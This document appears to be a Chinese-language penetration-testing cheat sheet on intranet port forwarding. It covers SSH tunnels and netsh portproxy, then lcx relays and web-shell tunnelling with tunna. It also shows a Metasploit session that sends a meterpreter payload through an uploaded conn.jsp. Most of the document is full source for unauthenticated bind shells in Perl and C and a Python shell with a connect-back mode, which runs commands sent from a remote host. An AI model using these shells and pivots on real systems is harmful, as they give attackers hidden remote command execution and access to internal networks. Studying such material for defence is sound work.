Linux
ssh
- SA 服务器
- CA 客户A
- CB 客户B
CA通过SA访问CB服务,在CA上执行
ssh USER@HOST_A -p HOST_A_SSH_PORT -L 127.0.0.1:LOCAL_PORT:HOST_B:HOST_B_PORT
例:将远程 MySQL 端口映射至本地端口 13306
ssh root@1.2.3.4 -p 22 -L 127.0.0.1:13306:10.0.0.102:3306
putty配置
Connection -> SSH -> Tunnels
- Source port:本地端口
- Destination:目标IP:端口
- 选项:Local 与 Auto
Windows
netsh
Windows 2000/XP/2003中均带有Netsh命令。Windows Server 2008只是对netsh的参数项做了些扩展。
首先安装IPV6(xp下IPV6必须安装)
netsh interface ipv6 install
添加一个IPV4到IPV4的端口映射
netsh interface portproxy add v4tov4 listenaddress=192.168.1.1 listenport=22 connectaddress=xxx.xxx.xxx.xxx connectport=22
删除指定监听ip和端口
netsh interface portproxy delete v4tov4 listenaddress=192.168.1.1 listenport=22
查看存在的转发
netsh interface portproxy show all
lcx.exe
lcx.exe -l 3333 4444
lcx.exe -s your-server-ip 3333 127.0.0.1 3389
Web
tunna
支持环境
- conn.jsp Tested on Apache Tomcat (windows + linux)
- conn.aspx Tested on IIS 6+8 (windows server 2003/2012)
- conn.php Tested on LAMP + XAMPP + IIS (windows + linux)
下载地址:http://www.secforce.com/media/tools/tunna_v0.1.zip
上传conn.php到主机,本地执行
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -r 3389 -v
转发 SSH 时,还需要添加 -s 参数,才能保证连接不会中断
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -r 3389 -s -v
转发IP
python proxy.py -u http://192.x.x.x/conn.php -l 13389 -a 172.16.1.33 -r 3389
把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录
cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7 <-- 注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j
reDuh-GUI
- 不需要JAVA运行环境
- 可视化操作
- 支持HTTP/HTTPS
- 支持二级代理
reDuh-GUI http://down2.nosec.org/reDuhGUI_0.1.rar
脚本
perl
#!/usr/bin/perl
# Minimal TCP bind shell: listens on the port given as the first argument
# and hands every accepted connection an interactive shell.  No
# authentication of the peer is performed; each connection is served by a
# forked child while the parent keeps accepting.
$os = $^O;
$SHELL = "/bin/sh";
# On Windows use the command interpreter instead.
# NOTE(review): the pattern /win/i also matches "darwin" (macOS).
if ( $os =~ m/win/i ) { $SHELL = "%COMSPEC% /K"; }
# Exit quietly when no port was supplied.
if ( @ARGV < 1 ) { exit(1); }
$LISTEN_PORT = $ARGV[0];
use Socket;
$protocol = getprotobyname('tcp');
socket( S, &PF_INET, &SOCK_STREAM, $protocol ) || die("error\n");
# SO_REUSEADDR lets the listener be restarted on the same port right away.
setsockopt( S, SOL_SOCKET, SO_REUSEADDR, 1 );
# INADDR_ANY: the listener is reachable on every local interface.
bind( S, sockaddr_in( $LISTEN_PORT, INADDR_ANY ) ) || die("error\n");
listen( S, 3 ) || die "";
while (1) {
    accept( CONN, S );
    # fork returns 0 in the child (and undef on failure), so only the child
    # enters this block; the parent loops back to accept().
    if ( !( $pid = fork ) ) {
        die "Cannot fork" if ( !defined $pid );
        # Attach the child's stdin/stdout/stderr to the socket ...
        open STDIN, "<&CONN";
        open STDOUT, ">&CONN";
        open STDERR, ">&CONN";
        # ... then replace the child process with the shell.
        # NOTE(review): `||` binds tighter than exec's argument list, so this
        # parses as exec($SHELL || die ...) and the die never fires; on exec
        # failure the child falls through to close/exit below.
        exec $SHELL || die("error\n");
        close CONN;
        exit 0;
    }
}
python
#!/usr/bin/env python
import os, sys, socket, time
MAX_LEN=1024          # bytes read from the socket per recv() call
SHELL="/bin/bash -c"  # prefix each received command line is run through
TIME_OUT=300          # seconds, applied to the server socket via settimeout()
PORT=""               # set from argv[1] in the entry-point code below
HOST=""               # set from argv[2] (connect-back mode) below
def shell(cmd):
    """Run *cmd* through SHELL and return its stdout as one string.

    *cmd* is appended to SHELL with a space and no quoting, so it is executed
    exactly as received from the socket.  os.popen() captures stdout only;
    stderr goes to the process's own stderr.
    """
    sh_out=os.popen(SHELL+" "+cmd).readlines()
    # Re-join the output lines (readlines() keeps the trailing newlines).
    nsh_out=""
    for i in range(len(sh_out)):
        nsh_out+=sh_out[i]
    return nsh_out
def action(conn):
    """Serve one connected peer until it disconnects or asks for shutdown.

    Each chunk read from *conn* is treated as one command line: the final
    character (assumed to be the trailing newline) is dropped and the rest
    is executed via shell(), with the output sent back on the socket.  Two
    control words are recognised instead of being executed:
      ``:dc`` -> return True  (drop this peer; the caller keeps serving)
      ``:sd`` -> return False (the caller stops the server)
    Any exception from recv() also returns True.

    NOTE(review): recv() returns str on Python 2; on Python 3 it returns
    bytes and the per-character concatenation below raises TypeError.
    NOTE(review): when the peer closes, recv() returns an empty string,
    which produces an empty cmd and no return, so the loop appears to
    busy-spin rather than exit.
    """
    while True:
        try:
            pcmd=conn.recv(MAX_LEN)
        except:  # bare except: every socket error ends up here
            print("error\n")
            return True
        else:
            # Copy everything except the last character.
            cmd=""
            for i in range(len(pcmd)-1):
                cmd+=pcmd[i]
            if cmd==":dc":
                return True
            elif cmd==":sd":
                return False
            else:
                # Empty lines are ignored; anything else is run as a command.
                if len(cmd)>0:
                    out=shell(cmd)
                    conn.send(out)
# --- entry point ------------------------------------------------------------
# Two invocation forms, selected by argument count:
#   PORT       -> bind mode: listen on localhost:PORT and accept peers
#   PORT HOST  -> connect-back mode: repeatedly connect out to HOST:PORT
argv=sys.argv
if len(argv)==2:
    PORT=argv[1]
elif len(argv)==3:
    PORT=argv[1]
    HOST=argv[2]
else: exit(1)
PORT=int(PORT)
# Detach: the parent exits at once and the child carries on in the background.
if os.fork()!=0:
    sys.exit(0)
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# accept()/connect() on this socket give up after TIME_OUT seconds; the
# resulting exception is caught in the loop below.
sock.settimeout(TIME_OUT)
if len(argv)==2:
    # Bind mode listens on the loopback address only, so the listener is
    # reachable just from the same host.
    sock.bind(('localhost', PORT))
    sock.listen(0)
run=True
# action() returns True to keep serving and False on the ':sd' command.
while run:
    if len(argv)==3:
        # NOTE(review): after action() returns True the same socket is
        # connect()ed again, which is likely to fail, so this mode appears
        # to stay in the retry branch from then on.
        try: sock.connect((HOST, PORT))
        except:
            print("error\n")
            time.sleep(5)  # back off before retrying
        else: run=action(sock)
    else:
        try: (conn,addr)=sock.accept()
        except:
            print("error\n")
            time.sleep(1)
        else: run=action(conn)
# Orderly close; 2 == socket.SHUT_RDWR.
if len(argv)==2: conn.shutdown(2)
else:
    # Connect-back mode: probe with an empty send and shut down only if the
    # socket is still usable.
    try: sock.send("")
    except: time.sleep(1)
    else: sock.shutdown(2)
c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
/*
 * Bind shell.  The parent returns immediately (the process backgrounds
 * itself); the forked child listens on the TCP port named by argv[1] on
 * every interface and attaches an unauthenticated /bin/sh to the first
 * accepted connection.
 *
 * Written in K&R style.  atoi(), fork(), dup2(), execl() and close() are
 * used without <stdlib.h>/<unistd.h>, relying on implicit declarations;
 * argv[1] is used without checking that it exists.
 */
int main( argc, argv )
int argc;
char **argv; {
    int sockfd, newfd;
    struct sockaddr_in remote;
    /* Only the child (fork() == 0) does any work; the parent falls off the end of main. */
    if ( fork() == 0 )
    {
        remote.sin_family = AF_INET;
        remote.sin_port = htons( atoi( argv[1] ) );
        remote.sin_addr.s_addr = htonl( INADDR_ANY );
        sockfd = socket( AF_INET, SOCK_STREAM, 0 );
        /* NOTE(review): socket() reports failure with -1, not 0, so this check never fires. */
        if ( !sockfd )
            perror( "error\n" );
        /* 0x10 is sizeof(struct sockaddr_in); the bind() result is not checked. */
        bind( sockfd, (struct sockaddr *) &remote, 0x10 );
        listen( sockfd, 5 );
        while ( 1 )
        {
            newfd = accept( sockfd, 0, 0 );
            /* Point stdin/stdout/stderr at the connection, then replace this
             * process with the shell.  There is no per-connection fork, so
             * a successful execl() ends the listener: only the first peer is
             * served.  close() and the next accept() run only if execl() fails. */
            dup2( newfd, 0 );
            dup2( newfd, 1 );
            dup2( newfd, 2 );
            execl( "/bin/sh", "sh", (char *) 0 );
            close( newfd );
        }
    }
}
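/*
 * Compare a candidate string against a reference value.
 *
 * *entered* is first truncated in place at the first '\n' or '\r', so a
 * line read with fgets() compares equal to its bare form.
 *
 * Returns 0 when the truncated *entered* equals *base*, 1 otherwise.
 * (The original fell off the end without a return on mismatch, which is
 * undefined behaviour in C; the explicit return fixes that.)
 *
 * NOTE(review): the name suggests a password check; strcmp() stops at the
 * first differing byte, so its running time depends on the input.
 */
int chpass( char *base, char *entered )
{
    size_t i;
    for ( i = 0; i < strlen( entered ); i++ )
    {
        if ( entered[i] == '\n' || entered[i] == '\r' )
        {
            entered[i] = '\0';
            break;  /* string now ends here; nothing further to scan */
        }
    }
    return strcmp( base, entered ) != 0;
}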
参考
- 内网端口转发方法汇总 http://silic.org/post/Port_Forwarding_from_Intranet_Multiple_Collection
- tunna工具使用实例 http://drops.wooyun.org/tools/650
- 通过ssh端口映射 间接访问远程内网服务器 http://mrasong.com/a/ssh-port-forword
- windows命令行下用netsh实现端口转发(端口映射) http://blog.phpdr.net/windows%E5%91%BD%E4%BB%A4%E8%A1%8C%E4%B8%8B%E7%94%A8netsh%E5%AE%9E%E7%8E%B0%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84.html